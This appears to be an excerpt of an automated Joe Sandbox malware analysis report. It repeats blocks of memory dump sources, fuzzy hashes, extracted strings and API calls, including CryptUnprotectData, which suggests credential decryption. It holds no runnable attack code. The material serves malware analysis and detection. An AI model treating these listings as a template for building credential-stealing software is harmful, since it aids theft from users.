                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 3kw$R*uc$t<^O
                                  • API String ID: 0-822228879
                                  • Opcode ID: 25917f04fb6c4d22af9bc6da877c95239e3d20c4ee08834cb39cb27230381e47
                                  • Instruction ID: 1644c2dbc1fc7d21dc4b25f25f70fe9c290327c0ed347cb954bf159544dc2eff
                                  • Opcode Fuzzy Hash: 25917f04fb6c4d22af9bc6da877c95239e3d20c4ee08834cb39cb27230381e47
                                  • Instruction Fuzzy Hash: 15B218F36082049FE3046E2DEC8577AFBE9EF94720F1A4A3DEAC5C7744E93558018696
                                  APIs
                                  • CoCreateInstance.COMBASE(0071E120,00000000,00000001,0071E110,00000000), ref: 007139A8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00713A00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 70fbb54272226fe09c52165f7f964479e392d6fb28ac24edf6ff5315a6546a98
                                  • Instruction ID: 2c0af321f8fa7d59ccf1882d037102e77d013e1ea8c698153fbfba0ca9c97a95
                                  • Opcode Fuzzy Hash: 70fbb54272226fe09c52165f7f964479e392d6fb28ac24edf6ff5315a6546a98
                                  • Instruction Fuzzy Hash: 2941D970A40A289FDB24DB58CC95BDBB7B5AB48702F4082D9E618E72D0D7716EC5CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0070A2D4
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 0070A2F3
                                  • LocalFree.KERNEL32(?), ref: 0070A323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 58e76001d1c023fd3f15f3a894c5fc68f6d9dab4c8c87f01e6fd1bdfe113c6ed
                                  • Instruction ID: ceaeb4d12db1011a41d81175271205044ce5db64a467a3bd2dda38a32bdb6901
                                  • Opcode Fuzzy Hash: 58e76001d1c023fd3f15f3a894c5fc68f6d9dab4c8c87f01e6fd1bdfe113c6ed
                                  • Instruction Fuzzy Hash: 4E11B7B8A05209EFCB04DFA4D985AAEB7B5FF89300F104559ED15A7390E734AE50CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: )@vS$ji~
                                  • API String ID: 0-4035643750
                                  • Opcode ID: 440e095871f1c83626ade83a6f38ad5443679545722ed2e4ebf1f94a9555d587
                                  • Instruction ID: 8d5f49df4d46bd969807afcff4cbf8a2f01f248913c0b85dc94bb10c914af610
                                  • Opcode Fuzzy Hash: 440e095871f1c83626ade83a6f38ad5443679545722ed2e4ebf1f94a9555d587
                                  • Instruction Fuzzy Hash: 15B216F3A08204AFD3046E2DEC8567AB7E9EF94720F1A493DEAC5C7744EA3558018797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: aS_f$c;
                                  • API String ID: 0-2282223921
                                  • Opcode ID: bd9d14f9211895d937d91ad190e7fdd0cd12e9f6ce9ecb2f9fc53fe7195990da
                                  • Instruction ID: f858ae35771c773934c1141e3a5faaacd1a61b8ef0ef25ac4f1f7ae570a3d28c
                                  • Opcode Fuzzy Hash: bd9d14f9211895d937d91ad190e7fdd0cd12e9f6ce9ecb2f9fc53fe7195990da
                                  • Instruction Fuzzy Hash: AAB2F6F360C204AFE704AE2DEC8567ABBE9EFD4320F16893DE6C583744E63558058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?$__ZN
                                  • API String ID: 0-1427190319
                                  • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction ID: c6270e7f5eb628bc4f51cdd7a4ed2b64c746f9f9b00d434c8b2b6dfa1bda7227
                                  • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction Fuzzy Hash: A0723672908B509BDB14CF24C88066AB7E2FFC5390F59CA1DF5999B291D3B8DC41DB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: v|I$}K/~
                                  • API String ID: 0-1723024461
                                  • Opcode ID: 7d1df02061530650b11a61b51bf92ee531832a5e5a2b39241917f8ccf0ccd2cc
                                  • Instruction ID: 0422776b260735eed90a645eef6811b36463377079ede2fc36cedf5e0cd3071c
                                  • Opcode Fuzzy Hash: 7d1df02061530650b11a61b51bf92ee531832a5e5a2b39241917f8ccf0ccd2cc
                                  • Instruction Fuzzy Hash: 407119F3A182049BE3046E28DC4177ABBD5EB94720F1A463DEAC5D7384E53E68148787
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xn--
                                  • API String ID: 0-2826155999
                                  • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction ID: 1598ea586edea179ef5836ec73be9d96872164c461659e49d5683461a3eb24f7
                                  • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction Fuzzy Hash: 20A236B1D002688AEF18CB68C8543EDB7B1FF55302F9842AADC5677281D7BD5E89CB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction ID: bb4117d67d3c7c2920918235161c18e23a3f3856dccf8769437442ad83961152
                                  • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction Fuzzy Hash: 2EE1E1316087419FC724CF28C8917EEB7E2EF89305F49492DE8D997291D7759849CB82
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction ID: 130dc5133b13c1f32e22baaea18158e53fd770904b54b974f24cc1e06bb1603f
                                  • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction Fuzzy Hash: B5E1D471A083019FCB24CF18C8817EEB7E6EFC4315F15892DE9899B251E774AC89CB46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: UNC\
                                  • API String ID: 0-505053535
                                  • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction ID: 6efefd1c5068e0509166e4477f856c6b05853031cf55a512c9332c3f193a5c25
                                  • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction Fuzzy Hash: 0FE13E75D042658EEF10CF29C8843BEBFE2AB85314F198169DC965B292D73D8D45CBB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: p?
                                  • API String ID: 0-293216770
                                  • Opcode ID: 0433165c5890f40ca9096ab9100c2786c475a3ff07c4486894b314ee0092b32e
                                  • Instruction ID: e61049976d054ee447648ae1b5cf0132d9397f40db40eaf65cbd83a66ed00829
                                  • Opcode Fuzzy Hash: 0433165c5890f40ca9096ab9100c2786c475a3ff07c4486894b314ee0092b32e
                                  • Instruction Fuzzy Hash: E16105F3A186049FE3157E29DC857BAF7E6EF94310F1A493CD6C483784EA3898448786
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
